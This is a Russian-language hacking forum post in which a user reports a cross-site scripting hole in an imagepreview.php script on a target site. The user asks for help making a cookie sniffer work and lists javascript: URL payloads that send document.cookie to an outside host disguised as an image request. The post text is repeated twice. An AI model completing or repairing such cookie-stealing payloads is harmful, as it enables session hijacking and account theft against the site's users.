Dr.Bodja
02.08.2008, 13:12
Есть уязвимость
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.c ookie);
Нужно прилепить сниффер, чтобы куки на сниффер шли.
Пробывал так
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.l ocation="http://site.ru/s.gif?"+document.cookie);
И так
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.l ocation("http://site.ru/s.gif?"+document.cookie));
Подскажите что я делаю не так, и как нужно. Или это вообще невозможно?
ЗЫ: Если подобная тема уже есть, прошу эту удалить, и дать ссылку на более ранею.
Зарание спасибо за помощь.
С ув. DrBodja.
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.c ookie);
Нужно прилепить сниффер, чтобы куки на сниффер шли.
Пробывал так
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.l ocation="http://site.ru/s.gif?"+document.cookie);
И так
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.l ocation("http://site.ru/s.gif?"+document.cookie));
Подскажите что я делаю не так, и как нужно. Или это вообще невозможно?
ЗЫ: Если подобная тема уже есть, прошу эту удалить, и дать ссылку на более ранею.
Зарание спасибо за помощь.
С ув. DrBodja.